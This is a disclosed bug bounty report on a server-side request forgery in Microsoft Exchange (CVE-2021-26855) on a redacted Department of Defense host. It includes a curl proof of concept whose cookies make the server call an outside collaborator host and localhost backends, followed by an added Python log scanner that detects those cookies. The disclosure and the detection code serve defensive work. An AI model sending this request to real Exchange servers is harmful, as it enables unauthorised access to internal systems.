SSRF due to CVE-2021-26855 on ████████

Disclosed: 2021-03-24 20:53:21 By spongebhav To deptofdefense
Severity: Critical
Vulnerability Details
**Description:** There exists a Server Side Request Forgery (SSRF) on ***█████████*** due to ***CVE-2021-26855***

## References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855

## Impact

Server Side Request Forgery

## System Host(s)

██████

## Affected Product(s) and Version(s)

## CVE Numbers

CVE-2021-26855

## Steps to Reproduce

```
curl -i -s -k -X $'GET' \
  -H $'Host: ████' \
  -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' \
  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
  -H $'Accept-Language: en-US,en;q=0.5' \
  -H $'Accept-Encoding: gzip, deflate' \
  -H $'Connection: close' \
  -H $'Upgrade-Insecure-Requests: 1' \
  -b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \
  $'https://███/owa/auth/x.js'
```

Output: █████████

## Suggested Mitigation/Remediation Actions
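An added detection example, not part of the report: a Python scan over constructed, simplified HttpProxy-style log rows (the column layout is an assumption, not Exchange's real log schema) that flags the two indicators a defender would hunt for here, the backend-override cookies used in the request above (`X-BEResource`, `X-AnonResource-Backend`) and, following Microsoft's published guidance for CVE-2021-26855, unauthenticated requests whose `AnchorMailbox` reads `ServerInfo~host/path`.

```python
import csv
import io
import re

# Constructed sample rows in an assumed, simplified CSV layout (not the real
# Exchange HttpProxy schema). Row 2 mirrors the cookies from the report's PoC;
# row 4 shows a ServerInfo~ anchor on an authenticated request, which is normal
# backend routing and must not be flagged.
SAMPLE_LOG = """DateTime,AuthenticatedUser,UrlStem,AnchorMailbox,Cookie
2021-03-24T20:00:01,DOMAIN\\alice,/owa/mail,SMTP:alice@example.test,-
2021-03-24T20:00:05,,/owa/auth/x.js,ServerInfo~localhost/owa/auth/logon.aspx?~3,X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3
2021-03-24T20:00:09,,/owa/auth/logon.aspx,-,-
2021-03-24T20:00:12,DOMAIN\\bob,/ecp/default.flt,ServerInfo~mbx01/ecp/default.flt,-
"""

# Cookies that steer the front end to an attacker-chosen backend (from the PoC).
BACKEND_COOKIE_RE = re.compile(r"\bX-(?:BEResource|AnonResource-Backend)=", re.I)
# Microsoft's published hunting pattern for CVE-2021-26855: an unauthenticated
# request whose AnchorMailbox looks like ServerInfo~<host>/<path>.
ANCHOR_RE = re.compile(r"^ServerInfo~[^/]+/.+", re.I)


def scan_log(text):
    """Return (DateTime, UrlStem, [matched rule names]) for each suspicious row."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        rules = []
        # Rule A only fires for unauthenticated traffic: authenticated users
        # legitimately get ServerInfo~ anchors, so that alone is not an alert.
        if not row["AuthenticatedUser"] and ANCHOR_RE.match(row["AnchorMailbox"]):
            rules.append("unauth-serverinfo-anchor")
        # Rule B: backend-override cookies should never appear in normal traffic.
        if BACKEND_COOKIE_RE.search(row["Cookie"]):
            rules.append("backend-override-cookie")
        if rules:
            findings.append((row["DateTime"], row["UrlStem"], rules))
    return findings


if __name__ == "__main__":
    for when, stem, rules in scan_log(SAMPLE_LOG):
        print(f"{when} {stem}: {', '.join(rules)}")
```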
Report Stats
  • Report ID: 1119224
  • State: Closed
  • Substate: resolved
  • Upvotes: 8